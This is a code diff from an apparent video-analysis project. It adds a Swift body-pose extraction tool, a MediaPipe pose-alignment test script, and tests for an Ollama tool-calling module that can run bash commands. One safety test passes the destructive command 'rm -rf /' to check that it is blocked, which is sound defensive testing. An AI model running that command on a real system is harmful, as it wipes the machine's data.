/// 4. Associate each pose with the nearest face's trace_id
|
||||
/// 5. Output pose.json at 8Hz sampling (floor(fps/8) interval)
|
||||
@main
|
||||
struct SwiftPoseExpansion: ParsableCommand {
|
||||
@Argument(help: "Video file path")
|
||||
var videoPath: String
|
||||
|
||||
@Argument(help: "Input face_traced.json path")
|
||||
var faceTracedPath: String
|
||||
|
||||
@Argument(help: "Output pose.json path")
|
||||
var outputPath: String
|
||||
|
||||
@Option(name: .long, help: "UUID for logging")
|
||||
var uuid: String = ""
|
||||
|
||||
@Option(name: .long, help: "Consecutive miss threshold to stop expansion (default: 3)")
|
||||
var missThreshold: Int = 3
|
||||
|
||||
mutating func run() throws {
|
||||
let startTime = Date()
|
||||
print("[PoseExpansion] Starting pose expansion from face traces: \(videoPath)")
|
||||
|
||||
// Load face_traced.json
|
||||
guard let faceData = try? Data(contentsOf: URL(fileURLWithPath: faceTracedPath)) else {
|
||||
print("[PoseExpansion] ERROR: Cannot read \(faceTracedPath)")
|
||||
return
|
||||
}
|
||||
|
||||
guard let faceJson = try? JSONSerialization.jsonObject(with: faceData) as? [String: Any] else {
|
||||
print("[PoseExpansion] ERROR: Invalid JSON in \(faceTracedPath)")
|
||||
return
|
||||
}
|
||||
|
||||
// Extract frames with trace_id mapping
|
||||
// frameToTraces: frame -> [(trace_id, x, y, w, h)]
|
||||
var frameToTraces: [Int: [(traceId: Int, x: Double, y: Double, w: Double, h: Double)]] = [:]
|
||||
var allTraceIds: Set<Int> = []
|
||||
|
||||
// Handle both dict and list format
|
||||
if let framesDict = faceJson["frames"] as? [String: Any] {
|
||||
for (frameStr, frameData) in framesDict {
|
||||
guard let frameNum = Int(frameStr) else { continue }
|
||||
if let faces = (frameData as? [String: Any])?["faces"] as? [[String: Any]] {
|
||||
for face in faces {
|
||||
if let traceId = face["trace_id"] as? Int, traceId > 0 {
|
||||
allTraceIds.insert(traceId)
|
||||
let bbox = face["bbox"] as? [String: Any]
|
||||
let x = bbox?["x"] as? Double ?? face["x"] as? Double ?? 0
|
||||
let y = bbox?["y"] as? Double ?? face["y"] as? Double ?? 0
|
||||
let w = bbox?["width"] as? Double ?? face["width"] as? Double ?? 0
|
||||
let h = bbox?["height"] as? Double ?? face["height"] as? Double ?? 0
|
||||
frameToTraces[frameNum, default: []].append((traceId, x, y, w, h))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
} else if let framesList = faceJson["frames"] as? [[String: Any]] {
|
||||
for frameData in framesList {
|
||||
guard let frameNum = frameData["frame"] as? Int else { continue }
|
||||
if let faces = frameData["faces"] as? [[String: Any]] {
|
||||
for face in faces {
|
||||
if let traceId = face["trace_id"] as? Int, traceId > 0 {
|
||||
allTraceIds.insert(traceId)
|
||||
let bbox = face["bbox"] as? [String: Any]
|
||||
let x = bbox?["x"] as? Double ?? face["x"] as? Double ?? 0
|
||||
let y = bbox?["y"] as? Double ?? face["y"] as? Double ?? 0
|
||||
let w = bbox?["width"] as? Double ?? face["width"] as? Double ?? 0
|
||||
let h = bbox?["height"] as? Double ?? face["height"] as? Double ?? 0
|
||||
frameToTraces[frameNum, default: []].append((traceId, x, y, w, h))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
print("[PoseExpansion] Found \(allTraceIds.count) traces, \(frameToTraces.count) frames in \(faceTracedPath)")
|
||||
|
||||
if frameToTraces.isEmpty {
|
||||
print("[PoseExpansion] No traces found, skipping pose expansion")
|
||||
let emptyOutput: [String: Any] = ["frame_count": 0, "fps": 0.0, "frames": []]
|
||||
let jsonData = try JSONSerialization.data(withJSONObject: emptyOutput, options: [])
|
||||
try jsonData.write(to: URL(fileURLWithPath: outputPath))
|
||||
return
|
||||
}
|
||||
|
||||
// Get video info
|
||||
let url = URL(fileURLWithPath: videoPath)
|
||||
let asset = AVAsset(url: url)
|
||||
guard let videoTrack = asset.tracks(withMediaType: .video).first else {
|
||||
print("[PoseExpansion] ERROR: No video track")
|
||||
return
|
||||
}
|
||||
|
||||
let fps = videoTrack.nominalFrameRate
|
||||
let duration = CMTimeGetSeconds(asset.duration)
|
||||
let totalFrames = Int(duration * Double(fps))
|
||||
let sampleInterval = max(1, Int(floor(Double(fps) / 8.0)))
|
||||
|
||||
print("[PoseExpansion] Video: \(fps)fps, \(totalFrames) frames, 8Hz interval=\(sampleInterval)")
|
||||
|
||||
// Build set of all face frames
|
||||
let allFaceFrameSet = Set(frameToTraces.keys)
|
||||
|
||||
// Track which frames have pose with trace_id
|
||||
var poseFrameDict: [Int: [String: Any]] = [:]
|
||||
|
||||
// Setup asset reader
|
||||
let outputSettings: [String: Any] = [
|
||||
kCVPixelBufferPixelFormatTypeKey as String: kCVPixelFormatType_32BGRA
|
||||
]
|
||||
|
||||
let reader = try AVAssetReader(asset: asset)
|
||||
let trackOutput = AVAssetReaderTrackOutput(track: videoTrack, outputSettings: outputSettings)
|
||||
trackOutput.alwaysCopiesSampleData = false
|
||||
reader.add(trackOutput)
|
||||
|
||||
guard reader.startReading() else {
|
||||
print("[PoseExpansion] ERROR: Cannot start reader")
|
||||
return
|
||||
}
|
||||
|
||||
// Process frames
|
||||
var frameIndex = 0
|
||||
var consecutiveMisses = 0
|
||||
var activeTraceIds: Set<Int> = [] // Currently active traces being expanded
|
||||
|
||||
while let sampleBuffer = trackOutput.copyNextSampleBuffer() {
|
||||
defer { frameIndex += 1 }
|
||||
|
||||
guard let pixelBuffer = CMSampleBufferGetImageBuffer(sampleBuffer) else {
|
||||
continue
|
||||
}
|
||||
|
||||
// Check if this frame has face traces
|
||||
let faceTraces = frameToTraces[frameIndex]
|
||||
let isFaceFrame = faceTraces != nil && !faceTraces!.isEmpty
|
||||
|
||||
if isFaceFrame, let traces = faceTraces {
|
||||
// Update active traces
|
||||
for ft in traces {
|
||||
activeTraceIds.insert(ft.traceId)
|
||||
}
|
||||
consecutiveMisses = 0
|
||||
}
|
||||
|
||||
// Check if we should process this frame
|
||||
let shouldProcess = isFaceFrame ||
|
||||
(consecutiveMisses < missThreshold * sampleInterval && !activeTraceIds.isEmpty)
|
||||
|
||||
if shouldProcess {
|
||||
let poseResult = detectPose(pixelBuffer: pixelBuffer)
|
||||
|
||||
if poseResult.hasPose {
|
||||
let seconds = Double(frameIndex) / Double(fps)
|
||||
|
||||
// Determine trace_id for this pose
|
||||
var traceId = 0
|
||||
if isFaceFrame, let traces = faceTraces {
|
||||
// Use the trace_id from face (may need bbox matching for multi-person)
|
||||
// For now, use the first trace_id found
|
||||
traceId = traces.first?.traceId ?? 0
|
||||
} else {
|
||||
// Inherit from nearest face frame with active trace
|
||||
let nearestFaceFrame = findNearestFaceFrame(
|
||||
frameIndex: frameIndex,
|
||||
frameToTraces: frameToTraces,
|
||||
activeTraceIds: activeTraceIds
|
||||
)
|
||||
if let nearest = nearestFaceFrame, let traces = frameToTraces[nearest] {
|
||||
traceId = traces.first?.traceId ?? 0
|
||||
}
|
||||
}
|
||||
|
||||
poseFrameDict[frameIndex] = [
|
||||
"frame": frameIndex,
|
||||
"timestamp": seconds,
|
||||
"trace_id": traceId,
|
||||
"persons": poseResult.persons
|
||||
]
|
||||
consecutiveMisses = 0
|
||||
} else {
|
||||
consecutiveMisses += 1
|
||||
}
|
||||
}
|
||||
|
||||
// Progress logging
|
||||
if frameIndex % 5000 == 0 {
|
||||
let elapsed = Date().timeIntervalSince(startTime)
|
||||
print("[PoseExpansion] Frame \(frameIndex)/\(totalFrames), \(poseFrameDict.count) poses, \(Int(elapsed))s")
|
||||
fflush(stdout)
|
||||
}
|
||||
}
|
||||
|
||||
reader.cancelReading()
|
||||
|
||||
print("[PoseExpansion] Detection done: \(poseFrameDict.count) frames with pose")
|
||||
|
||||
// 8Hz sampling output
|
||||
var outputFrames: [[String: Any]] = []
|
||||
let sortedPoseFrames = poseFrameDict.keys.sorted()
|
||||
|
||||
var targetFrame = 0
|
||||
while targetFrame < totalFrames {
|
||||
// Find closest pose frame to target
|
||||
var closestFrame: Int? = nil
|
||||
var closestDist = Int.max
|
||||
|
||||
for poseFrame in sortedPoseFrames {
|
||||
let dist = abs(poseFrame - targetFrame)
|
||||
if dist < closestDist && dist <= sampleInterval {
|
||||
closestDist = dist
|
||||
closestFrame = poseFrame
|
||||
}
|
||||
}
|
||||
|
||||
if let cf = closestFrame, let data = poseFrameDict[cf] {
|
||||
outputFrames.append(data)
|
||||
}
|
||||
|
||||
targetFrame += sampleInterval
|
||||
}
|
||||
|
||||
// Write output
|
||||
let output: [String: Any] = [
|
||||
"frame_count": outputFrames.count,
|
||||
"fps": Double(fps),
|
||||
"frames": outputFrames
|
||||
]
|
||||
|
||||
let jsonData = try JSONSerialization.data(withJSONObject: output, options: [])
|
||||
try jsonData.write(to: URL(fileURLWithPath: outputPath))
|
||||
|
||||
let elapsed = Date().timeIntervalSince(startTime)
|
||||
print("[PoseExpansion] Done: \(outputFrames.count) frames at 8Hz, \(String(format: "%.1f", elapsed))s → \(outputPath)")
|
||||
}
|
||||
|
||||
/// Find nearest face frame with active trace
|
||||
func findNearestFaceFrame(
|
||||
frameIndex: Int,
|
||||
frameToTraces: [Int: [(traceId: Int, x: Double, y: Double, w: Double, h: Double)]],
|
||||
activeTraceIds: Set<Int>
|
||||
) -> Int? {
|
||||
var nearestFrame: Int? = nil
|
||||
var nearestDist = Int.max
|
||||
|
||||
for (frameNum, traces) in frameToTraces {
|
||||
// Check if this frame has an active trace
|
||||
let hasActiveTrace = traces.contains { activeTraceIds.contains($0.traceId) }
|
||||
if hasActiveTrace {
|
||||
let dist = abs(frameNum - frameIndex)
|
||||
if dist < nearestDist {
|
||||
nearestDist = dist
|
||||
nearestFrame = frameNum
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nearestFrame
|
||||
}
|
||||
|
||||
func detectPose(pixelBuffer: CVPixelBuffer) -> (hasPose: Bool, persons: [[String: Any]]) {
|
||||
let imgW = CGFloat(CVPixelBufferGetWidth(pixelBuffer))
|
||||
let imgH = CGFloat(CVPixelBufferGetHeight(pixelBuffer))
|
||||
|
||||
let handler = VNImageRequestHandler(cvPixelBuffer: pixelBuffer, options: [:])
|
||||
let bodyReq = VNDetectHumanBodyPoseRequest()
|
||||
|
||||
do {
|
||||
try handler.perform([bodyReq])
|
||||
} catch {
|
||||
return (false, [])
|
||||
}
|
||||
|
||||
let jointNames: [VNHumanBodyPoseObservation.JointName] = [
|
||||
.nose, .leftEye, .rightEye, .leftEar, .rightEar,
|
||||
.neck, .root,
|
||||
.leftShoulder, .rightShoulder,
|
||||
.leftElbow, .rightElbow,
|
||||
.leftWrist, .rightWrist,
|
||||
.leftHip, .rightHip,
|
||||
.leftKnee, .rightKnee,
|
||||
.leftAnkle, .rightAnkle,
|
||||
]
|
||||
|
||||
var persons: [[String: Any]] = []
|
||||
|
||||
let poses = bodyReq.results ?? []
|
||||
for pose in poses {
|
||||
var keypoints: [[String: Any]] = []
|
||||
var minX = CGFloat.greatestFiniteMagnitude
|
||||
var minY = CGFloat.greatestFiniteMagnitude
|
||||
var maxX: CGFloat = 0
|
||||
var maxY: CGFloat = 0
|
||||
|
||||
for joint in jointNames {
|
||||
if let point = try? pose.recognizedPoint(joint) {
|
||||
let desc = String(describing: joint.rawValue)
|
||||
var rawName = desc
|
||||
.replacingOccurrences(of: "VNRecognizedPointKey(_rawValue: ", with: "")
|
||||
.replacingOccurrences(of: ")", with: "")
|
||||
.trimmingCharacters(in: .whitespaces)
|
||||
|
||||
let nameMap: [String: String] = [
|
||||
"head_joint": "nose",
|
||||
"left_eye_joint": "left_eye",
|
||||
"right_eye_joint": "right_eye",
|
||||
"left_ear_joint": "left_ear",
|
||||
"right_ear_joint": "right_ear",
|
||||
"neck_1_joint": "neck",
|
||||
"left_shoulder_1_joint": "left_shoulder",
|
||||
"right_shoulder_1_joint": "right_shoulder",
|
||||
"left_elbow_1_joint": "left_elbow",
|
||||
"right_elbow_1_joint": "right_elbow",
|
||||
"left_hand_joint": "left_wrist",
|
||||
"right_hand_joint": "right_wrist",
|
||||
"left_hip_1_joint": "left_hip",
|
||||
"right_hip_1_joint": "right_hip",
|
||||
"left_knee_1_joint": "left_knee",
|
||||
"right_knee_1_joint": "right_knee",
|
||||
"left_ankle_1_joint": "left_ankle",
|
||||
"right_ankle_1_joint": "right_ankle",
|
||||
"center_hip_joint": "root",
|
||||
]
|
||||
if let mapped = nameMap[rawName] {
|
||||
rawName = mapped
|
||||
}
|
||||
|
||||
let px = point.location.x * CGFloat(imgW)
|
||||
let py = CGFloat(imgH) - point.location.y * CGFloat(imgH)
|
||||
keypoints.append([
|
||||
"name": rawName.isEmpty ? "\(joint)" : rawName,
|
||||
"x": px,
|
||||
"y": py,
|
||||
"confidence": point.confidence,
|
||||
])
|
||||
|
||||
if point.confidence > 0.1 {
|
||||
minX = min(minX, px)
|
||||
minY = min(minY, py)
|
||||
maxX = max(maxX, px)
|
||||
maxY = max(maxY, py)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
var bbox: [String: Any] = ["x": 0, "y": 0, "width": 0, "height": 0]
|
||||
if maxX > minX {
|
||||
bbox = [
|
||||
"x": Int(minX),
|
||||
"y": Int(minY),
|
||||
"width": Int(maxX - minX),
|
||||
"height": Int(maxY - minY),
|
||||
]
|
||||
}
|
||||
|
||||
persons.append(["keypoints": keypoints, "bbox": bbox])
|
||||
}
|
||||
|
||||
return (!persons.isEmpty, persons)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,345 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Test MediaPipe Pose alignment on face trace key frames
|
||||
|
||||
Tests 50 random key frames to determine alignment rate.
|
||||
Handles multiple poses by matching only the correct one with face bbox.
|
||||
|
||||
Usage:
|
||||
python3 scripts/test_mediapipe_pose_alignment.py --file-uuid <uuid> --sample-size 50
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import random
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import cv2
|
||||
import mediapipe as mp
|
||||
from mediapipe.tasks.python.vision import PoseLandmarker, PoseLandmarkerOptions
|
||||
from mediapipe.tasks.python.core.base_options import BaseOptions
|
||||
except ImportError as e:
|
||||
print(f"Missing dependency: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
LANDMARK_NAMES = [
|
||||
"nose", "left_eye_inner", "left_eye", "left_eye_outer",
|
||||
"right_eye_inner", "right_eye", "right_eye_outer",
|
||||
"left_ear", "right_ear", "mouth_left", "mouth_right",
|
||||
"left_shoulder", "right_shoulder", "left_elbow", "right_elbow",
|
||||
"left_wrist", "right_wrist", "left_pinky", "right_pinky",
|
||||
"left_index", "right_index", "left_thumb", "right_thumb",
|
||||
"left_hip", "right_hip", "left_knee", "right_knee",
|
||||
"left_ankle", "right_ankle", "left_heel", "right_heel",
|
||||
"left_foot_index", "right_foot_index",
|
||||
]
|
||||
|
||||
|
||||
def point_in_bbox(x, y, bbox):
|
||||
"""Check if point (in pixels) is inside bbox (in pixels)."""
|
||||
return (bbox['x'] <= x <= bbox['x'] + bbox['width'] and
|
||||
bbox['y'] <= y <= bbox['y'] + bbox['height'])
|
||||
|
||||
|
||||
def get_face_bbox(face_data, trace_id):
|
||||
"""Get face bbox for a trace from face_traced.json."""
|
||||
traces = face_data.get('traces', {})
|
||||
frames = face_data.get('frames', {})
|
||||
|
||||
if trace_id not in traces:
|
||||
return None
|
||||
|
||||
trace = traces[trace_id]
|
||||
start_frame = str(trace.get('start_frame', 0))
|
||||
|
||||
if start_frame not in frames:
|
||||
return None
|
||||
|
||||
frame_data = frames[start_frame]
|
||||
faces = frame_data.get('faces', [])
|
||||
|
||||
# Find the face that belongs to this trace
|
||||
for face in faces:
|
||||
if face.get('trace_id') == int(trace_id):
|
||||
return {
|
||||
'x': face['x'],
|
||||
'y': face['y'],
|
||||
'width': face['width'],
|
||||
'height': face['height']
|
||||
}
|
||||
|
||||
# Fallback: use first face
|
||||
if faces:
|
||||
face = faces[0]
|
||||
return {
|
||||
'x': face['x'],
|
||||
'y': face['y'],
|
||||
'width': face['width'],
|
||||
'height': face['height']
|
||||
}
|
||||
|
||||
return None
|
||||
|
||||
|
||||
def check_pose_alignment(pose_landmarks, face_bbox, img_width, img_height):
|
||||
"""
|
||||
Check if pose face keypoints align with face bbox.
|
||||
|
||||
Returns: (aligned: bool, face_keypoints: dict)
|
||||
"""
|
||||
# Get face keypoints from pose
|
||||
kp_dict = {}
|
||||
for idx, landmark in enumerate(pose_landmarks):
|
||||
if idx < len(LANDMARK_NAMES):
|
||||
name = LANDMARK_NAMES[idx]
|
||||
if name in ['nose', 'left_eye', 'right_eye']:
|
||||
# Convert normalized coords to pixels
|
||||
kp_dict[name] = {
|
||||
'x': landmark.x * img_width,
|
||||
'y': landmark.y * img_height,
|
||||
'confidence': landmark.visibility if hasattr(landmark, 'visibility') else 1.0
|
||||
}
|
||||
|
||||
# Check if all 3 keypoints are in bbox
|
||||
required = ['nose', 'left_eye', 'right_eye']
|
||||
if not all(k in kp_dict for k in required):
|
||||
return False, kp_dict
|
||||
|
||||
for name in required:
|
||||
kp = kp_dict[name]
|
||||
if not point_in_bbox(kp['x'], kp['y'], face_bbox):
|
||||
return False, kp_dict
|
||||
|
||||
return True, kp_dict
|
||||
|
||||
|
||||
def test_alignment(file_uuid, output_dir, sample_size=None):
|
||||
"""Test MediaPipe pose alignment on key frames.
|
||||
|
||||
Args:
|
||||
sample_size: If None, process all key frames. Otherwise, sample N.
|
||||
"""
|
||||
|
||||
# Load face data
|
||||
face_json = Path(output_dir) / f"{file_uuid}.face_traced.json"
|
||||
if not face_json.exists():
|
||||
print(f"[pose_keyframe] Face file not found: {face_json}", file=sys.stderr)
|
||||
return
|
||||
|
||||
with open(face_json) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
# Get all trace IDs with key_frame.jpg
|
||||
output_path = Path(output_dir) / file_uuid
|
||||
trace_dirs = sorted(output_path.glob("trace_*"))
|
||||
|
||||
valid_traces = []
|
||||
for trace_dir in trace_dirs:
|
||||
key_frame = trace_dir / "key_frame.jpg"
|
||||
if key_frame.exists():
|
||||
trace_id = trace_dir.name.replace("trace_", "")
|
||||
valid_traces.append(trace_id)
|
||||
|
||||
print(f"[pose_keyframe] Found {len(valid_traces)} traces with key_frame.jpg")
|
||||
|
||||
# Sample or process all
|
||||
if sample_size and len(valid_traces) > sample_size:
|
||||
sample_traces = random.sample(valid_traces, sample_size)
|
||||
else:
|
||||
sample_traces = valid_traces
|
||||
|
||||
print(f"[pose_keyframe] Processing {len(sample_traces)} key frames...")
|
||||
|
||||
# Download model
|
||||
model_path = os.path.expanduser("~/.mediapipe/models/pose_landmarker_heavy.task")
|
||||
if not os.path.exists(model_path):
|
||||
os.makedirs(os.path.dirname(model_path), exist_ok=True)
|
||||
print(f"[test] Downloading model...")
|
||||
import urllib.request
|
||||
url = "https://storage.googleapis.com/mediapipe-models/pose_landmarker/pose_landmarker_heavy/float16/1/pose_landmarker_heavy.task"
|
||||
urllib.request.urlretrieve(url, model_path)
|
||||
|
||||
# Initialize MediaPipe
|
||||
options = PoseLandmarkerOptions(
|
||||
base_options=BaseOptions(model_asset_path=model_path),
|
||||
running_mode=mp.tasks.vision.RunningMode.IMAGE,
|
||||
)
|
||||
detector = PoseLandmarker.create_from_options(options)
|
||||
|
||||
# Test each sample
|
||||
results = []
|
||||
|
||||
for i, trace_id in enumerate(sample_traces):
|
||||
key_frame_path = output_path / f"trace_{trace_id}" / "key_frame.jpg"
|
||||
|
||||
# Get face bbox
|
||||
face_bbox = get_face_bbox(face_data, trace_id)
|
||||
if not face_bbox:
|
||||
results.append({
|
||||
'trace_id': trace_id,
|
||||
'status': 'no_face_bbox',
|
||||
'aligned': False
|
||||
})
|
||||
continue
|
||||
|
||||
# Read image
|
||||
img = cv2.imread(str(key_frame_path))
|
||||
if img is None:
|
||||
results.append({
|
||||
'trace_id': trace_id,
|
||||
'status': 'cannot_read_image',
|
||||
'aligned': False
|
||||
})
|
||||
continue
|
||||
|
||||
img_height, img_width = img.shape[:2]
|
||||
|
||||
# Detect pose
|
||||
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
|
||||
mp_image = mp.Image(mp.ImageFormat.SRGB, rgb_img)
|
||||
results_mp = detector.detect(mp_image)
|
||||
|
||||
if not results_mp.pose_landmarks:
|
||||
results.append({
|
||||
'trace_id': trace_id,
|
||||
'status': 'no_pose_detected',
|
||||
'aligned': False
|
||||
})
|
||||
continue
|
||||
|
||||
# Check each pose for alignment
|
||||
aligned_poses = []
|
||||
for pose_landmarks in results_mp.pose_landmarks:
|
||||
aligned, face_kps = check_pose_alignment(
|
||||
pose_landmarks, face_bbox, img_width, img_height
|
||||
)
|
||||
if aligned:
|
||||
# Get all keypoints
|
||||
all_keypoints = []
|
||||
for idx, landmark in enumerate(pose_landmarks):
|
||||
if idx < len(LANDMARK_NAMES):
|
||||
name = LANDMARK_NAMES[idx]
|
||||
all_keypoints.append({
|
||||
'name': name,
|
||||
'x': landmark.x * img_width,
|
||||
'y': landmark.y * img_height,
|
||||
'confidence': landmark.visibility if hasattr(landmark, 'visibility') else 1.0
|
||||
})
|
||||
|
||||
aligned_poses.append({
|
||||
'face_keypoints': face_kps,
|
||||
'keypoints': all_keypoints
|
||||
})
|
||||
|
||||
if aligned_poses:
|
||||
# Get all keypoints from the best aligned pose
|
||||
best_pose = aligned_poses[0]
|
||||
all_keypoints = []
|
||||
for idx, landmark in enumerate(pose_landmarks):
|
||||
if idx < len(LANDMARK_NAMES):
|
||||
name = LANDMARK_NAMES[idx]
|
||||
all_keypoints.append({
|
||||
'name': name,
|
||||
'x': landmark.x * img_width,
|
||||
'y': landmark.y * img_height,
|
||||
'confidence': landmark.visibility if hasattr(landmark, 'visibility') else 1.0
|
||||
})
|
||||
|
||||
pose_data = {
|
||||
'keypoints': all_keypoints,
|
||||
'face_keypoints': best_pose['face_keypoints'],
|
||||
'num_poses_detected': len(results_mp.pose_landmarks),
|
||||
'num_aligned': len(aligned_poses)
|
||||
}
|
||||
|
||||
results.append({
|
||||
'trace_id': trace_id,
|
||||
'status': 'aligned',
|
||||
'aligned': True,
|
||||
'pose_data': pose_data
|
||||
})
|
||||
else:
|
||||
results.append({
|
||||
'trace_id': trace_id,
|
||||
'status': 'pose_not_aligned',
|
||||
'aligned': False,
|
||||
'num_poses_detected': len(results_mp.pose_landmarks)
|
||||
})
|
||||
|
||||
if (i + 1) % 10 == 0:
|
||||
print(f"[test] Processed {i+1}/{len(sample_traces)} samples...")
|
||||
|
||||
detector.close()
|
||||
|
||||
# Calculate statistics
|
||||
total = len(results)
|
||||
aligned_count = sum(1 for r in results if r.get('aligned'))
|
||||
|
||||
status_counts = {}
|
||||
for r in results:
|
||||
status = r.get('status', 'unknown')
|
||||
status_counts[status] = status_counts.get(status, 0) + 1
|
||||
|
||||
print(f"\n[pose_keyframe] === RESULTS ===")
|
||||
print(f"[pose_keyframe] Total processed: {total}")
|
||||
print(f"[pose_keyframe] Aligned: {aligned_count} ({aligned_count/total*100:.1f}%)")
|
||||
print(f"[pose_keyframe] Not aligned: {total - aligned_count} ({(total-aligned_count)/total*100:.1f}%)")
|
||||
print(f"\n[pose_keyframe] Status breakdown:")
|
||||
for status, count in sorted(status_counts.items()):
|
||||
print(f"[pose_keyframe] {status}: {count} ({count/total*100:.1f}%)")
|
||||
|
||||
# Save results
|
||||
output_file = Path(output_dir) / f"{file_uuid}.pose_keyframe_results.json"
|
||||
with open(output_file, 'w') as f:
|
||||
json.dump({
|
||||
'total_processed': total,
|
||||
'aligned': aligned_count,
|
||||
'alignment_rate': f"{aligned_count/total*100:.1f}%",
|
||||
'status_counts': status_counts,
|
||||
'results': results
|
||||
}, f, indent=2)
|
||||
|
||||
print(f"\n[pose_keyframe] Results saved to: {output_file}")
|
||||
|
||||
# Update trace_profile.json for aligned poses
|
||||
print(f"\n[pose_keyframe] Updating trace_profile.json for aligned poses...")
|
||||
updated_count = 0
|
||||
for r in results:
|
||||
if r.get('aligned') and r.get('pose_data'):
|
||||
trace_id = r['trace_id']
|
||||
profile_path = output_path / f"trace_{trace_id}" / "trace_profile.json"
|
||||
|
||||
if profile_path.exists():
|
||||
with open(profile_path) as f:
|
||||
profile = json.load(f)
|
||||
|
||||
profile['pose'] = r['pose_data']
|
||||
profile['pose_aligned'] = True
|
||||
|
||||
with open(profile_path, 'w') as f:
|
||||
json.dump(profile, f, indent=2)
|
||||
|
||||
updated_count += 1
|
||||
|
||||
print(f"[pose_keyframe] Updated {updated_count} trace_profile.json files")
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Process MediaPipe pose on key frames")
|
||||
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
parser.add_argument("--sample-size", "-s", type=int, default=None, help="Sample size (default: all)")
|
||||
parser.add_argument("--all", "-a", action="store_true", help="Process all key frames")
|
||||
args = parser.parse_args()
|
||||
|
||||
sample_size = None if args.all else args.sample_size
|
||||
test_alignment(args.file_uuid, args.output_dir, sample_size)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,141 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Test script for Tool Calling Module
|
||||
====================================
|
||||
Tests sequential multi-tool execution.
|
||||
"""
|
||||
|
||||
import sys
|
||||
import os
|
||||
sys.path.insert(0, os.path.dirname(__file__))
|
||||
|
||||
from tool_caller import OllamaToolCaller, ToolResult
|
||||
import json
|
||||
|
||||
|
||||
def test_single_tool():
|
||||
"""Test single tool call"""
|
||||
print("=" * 60)
|
||||
print("TEST 1: Single Tool Call (PostgreSQL)")
|
||||
print("=" * 60)
|
||||
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
query = "How many videos are in the database?"
|
||||
print(f"Query: {query}")
|
||||
print("-" * 60)
|
||||
|
||||
result = caller.run(query)
|
||||
print(f"Result:\n{result}")
|
||||
print()
|
||||
|
||||
|
||||
def test_multi_tool():
|
||||
"""Test multi-tool sequential call"""
|
||||
print("=" * 60)
|
||||
print("TEST 2: Multi-Tool Sequential (PostgreSQL → Qdrant)")
|
||||
print("=" * 60)
|
||||
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
query = "Find videos about dogs, then search for similar content in the vector database"
|
||||
print(f"Query: {query}")
|
||||
print("-" * 60)
|
||||
|
||||
result = caller.run(query)
|
||||
print(f"Result:\n{result}")
|
||||
print()
|
||||
|
||||
|
||||
def test_tool_direct():
|
||||
"""Test direct tool execution"""
|
||||
print("=" * 60)
|
||||
print("TEST 3: Direct Tool Execution")
|
||||
print("=" * 60)
|
||||
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
# Test PostgreSQL directly
|
||||
print("Testing PostgreSQL tool directly:")
|
||||
result = caller.registry.execute("query_postgres", {
|
||||
"query": "SELECT COUNT(*) as count FROM videos"
|
||||
})
|
||||
print(f" Success: {result.success}")
|
||||
print(f" Data: {result.data}")
|
||||
print(f" Time: {result.execution_time_ms:.1f}ms")
|
||||
print()
|
||||
|
||||
# Test Bash directly
|
||||
print("Testing Bash tool directly:")
|
||||
result = caller.registry.execute("execute_bash", {
|
||||
"command": "echo 'Hello from Tool Caller!' && date"
|
||||
})
|
||||
print(f" Success: {result.success}")
|
||||
print(f" Data: {result.data}")
|
||||
print(f" Time: {result.execution_time_ms:.1f}ms")
|
||||
print()
|
||||
|
||||
|
||||
def test_bash_safety():
|
||||
"""Test bash command safety"""
|
||||
print("=" * 60)
|
||||
print("TEST 4: Bash Safety Check")
|
||||
print("=" * 60)
|
||||
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
# Test blocked command
|
||||
print("Testing blocked command (rm -rf /):")
|
||||
result = caller.registry.execute("execute_bash", {
|
||||
"command": "rm -rf /"
|
||||
})
|
||||
print(f" Success: {result.success}")
|
||||
print(f" Error: {result.error}")
|
||||
print()
|
||||
|
||||
# Test safe command
|
||||
print("Testing safe command:")
|
||||
result = caller.registry.execute("execute_bash", {
|
||||
"command": "ls -la /tmp | head -5"
|
||||
})
|
||||
print(f" Success: {result.success}")
|
||||
print(f" Data: {result.data}")
|
||||
print()
|
||||
|
||||
|
||||
def main():
|
||||
"""Run all tests"""
|
||||
print("\n" + "=" * 60)
|
||||
print("TOOL CALLING MODULE - TEST SUITE")
|
||||
print("=" * 60 + "\n")
|
||||
|
||||
try:
|
||||
# Test 1: Single tool
|
||||
test_single_tool()
|
||||
|
||||
# Test 2: Multi tool
|
||||
test_multi_tool()
|
||||
|
||||
# Test 3: Direct execution
|
||||
test_tool_direct()
|
||||
|
||||
# Test 4: Safety
|
||||
test_bash_safety()
|
||||
|
||||
print("=" * 60)
|
||||
print("ALL TESTS COMPLETED")
|
||||
print("=" * 60)
|
||||
|
||||
except Exception as e:
|
||||
print(f"\nERROR: {e}")
|
||||
import traceback
|
||||
traceback.print_exc()
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,790 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Momentry Tool Calling Module
|
||||
============================
|
||||
Supports sequential multi-tool execution using Ollama API.
|
||||
|
||||
Tools:
|
||||
- query_postgres: PostgreSQL database queries
|
||||
- search_qdrant: Vector similarity search
|
||||
- execute_bash: Bash command execution
|
||||
